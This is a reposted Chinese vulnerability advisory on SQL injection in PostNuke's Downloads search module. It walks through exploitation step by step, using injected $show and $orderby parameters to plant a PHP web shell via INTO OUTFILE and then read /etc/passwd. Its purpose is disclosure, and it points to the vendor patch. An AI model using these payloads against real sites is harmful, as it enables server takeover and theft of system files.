PostNuke多个脚本远程SQL注入漏洞-红旋风联盟-技术文档中心|RHU-Tech-Article-Center

相关联接

RHU本级分类

病毒防治
 漏洞公告
 基础入门
 Windows 系统安全
 Linux 系统安全
 防火墙
 IDS/IPS
数据库及Web安全

RHU相关搜索

　

RHU广而告之

　

>您的位置：首页 -> 安全技术-> 漏洞公告

PostNuke多个脚本远程SQL注入漏洞

作者:RHU-TAC编辑员来自:RHU网络编辑时间:2005-3-5 双击滚屏收藏本页 字体:大中小

点击查看RHU2004全年文章

来源:绿盟科技

受影响系统：

PostNuke PostNuke Phoenix 0.760-RC2
PostNuke PostNuke Phoenix 0.750

描述：

PHP-Nuke是一个广为流行的网站创建和管理工具，它可以使用很多数据库软件作为后端，比如MySQL、PostgreSQL、mSQL、Interbase、Sybase等。

PHP-Nuke多个脚本对用户提交的参数缺少充分过滤，远程攻击者可以利用这个漏洞进行SQL注入攻击，可能获得敏感信息或修改数据库。

问题一是modules/Downloads/dl-search.php的search()函数存在SQL注入：

- -51-68---
    if ($show!="") {
        $downloadsresults = $show;
    } else {
        $show=$downloadsresults;
    }
    //$query = stripslashes($query);
    $column = &$pntable['downloads_downloads_column'];
    $sql = "SELECT $column[lid], $column[cid], $column[sid],
                              $column[title], $column[url], $column[description],
                              $column[date], $column[hits], \
$column[downloadratingsummary],  $column[totalvotes], $column[totalcomments],
                              $column[filesize], $column[version], $column[homepage]
                              FROM $pntable[downloads_downloads]
                              WHERE $column[title] LIKE \
                '%".pnVarPrepForStore($query)."%'
                                OR $column[description] LIKE \
                '%".pnVarPrepForStore($query)."%'
                                ORDER BY $pntable[downloads_downloads].$orderby";

    $result = $dbconn->SelectLimit($sql, $downloadsresults, (int)$min);

问题存在于$show变量，提交如下URL：

http://[HOST]/[DIR]/index.php?name=Downloads&req=search&query=&show=cXIb8O3

会显示如下错误信息：

- ---------------
Fatal error: Call to a member function PO_RecordCount() on a non-object in \
                /www/PostNuke-0.760-RC2/html/modules/Downloads/dl-search.php on line \
                74
- ---------------

由于这个SQL注入在ORDER BY之后，不能使用UNION，但检查这个漏洞：

先检查PostNuke路径：

http://[HOST]/[DIR]/index.php?name=Downloads&req=search&query=&show=cXIb8O3

Error message :
- ---------------
Fatal error: Call to a member function PO_RecordCount() on a non-object in \
                /www/PostNuke-0.760-RC2/html/modules/Downloads/dl-search.php on line \
                74
- ---------------

如前缀为/www/PostNuke-0.760-RC2/html/。

现在增加新的downloadinsert到"Description"或"Home page" php代码，如：

- ---
<? system($_GET[cx]); ?>
- ---

这个这个download存在于db中，进入：

http://[HOST]/[DIR]/index.php?name=Downloads&req=search&query=[Program \
name]&show=10%20INTO%20OUTFILE%20'/[PATH]/pnTemp/Xanthia_cache/cXIb8O3.php'/*

就可以执行如下URL：

http://[HOST]/[DIR]/pnTemp/Xanthia_cache/cXIb8O3.php?cx=cat /etc/passwd

问题二是对$orderby缺少正确过滤，提交如下请求可进行SQL注入攻击：

http://[HOST]/[DIR]/index.php?name=Downloads&req=search&query=&orderby=

<*来源：Maksymilian Arciemowicz （max@jestsuper.pl）

  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=110962710805864&w=2

建议：

厂商补丁：

PostNuke
--------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.postnuke.com/

OVER

第[1] 页

RedHyphone.Union 投稿邮箱

[特别声明]:
①本站文章大多搜索转载自网络中，如果侵犯了您的权利，请告之我们。本站将立即删除。
②本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有。

【查看评论】【向上滚屏】【关闭窗口】【大中小】【打印】

-相关文章

openSUSE 11.1 Final - 正式发布

[视频]Opera Mini 4.2 正式版发布

dll注入系统进程(开源代码)

认知盲区解惑双网卡双线路DNS解析

FlashFXP 简体中文版 3.7.5 Build 1303 Beta[烈火]

-文章评论 (关闭)

·还没有相关的评论！

网上大名：

红旋风网络技术联盟　RHUTech.Union